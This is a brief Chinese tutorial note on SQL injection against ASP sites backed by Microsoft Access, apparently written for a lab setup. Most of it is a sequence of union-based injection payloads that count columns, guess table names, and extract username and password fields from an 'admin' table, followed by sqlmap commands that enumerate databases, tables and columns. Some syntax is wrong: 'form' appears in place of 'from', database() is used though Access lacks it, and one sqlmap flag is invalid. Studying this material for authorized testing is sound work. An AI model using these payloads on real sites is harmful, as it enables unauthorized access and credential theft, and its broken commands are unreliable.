web渗透sql注入1之access

web渗透sql注入1之access

环境搭建：

win2003 + asp + access

数据库特性：

access数据库没有root，不能读写文件，不能执行命令，只能借助字典得到数据

注入方式：

联合注入

偏移注入

注入过程：

1）判断当前表有多少列，How mush columns number

?id=1 order by 23

?id=1 order by 5

2)获取数据库 Get database

?id=1 union select 1,2,3,4,database()

3)使用字典获取表名 We can use dict check table name

?id=1 union select 1,2,3,4,5 form admin

4)使用字典获取字段名称 We can use dict check columns name 

?id=1 union select 1,username,3,password,5 form admin

注入工具

sqlmap

python sqlmap.py -r 1.txt

python sqlmap.py -r 1.txt --dbs

python sqlmap.py -r 1.txt --current-dbs

python sqlmap.py -r 1.txt --tables -D "databasename"

python sqlmap.py -r 1.txt --columns -T "tablename" -D "databasename"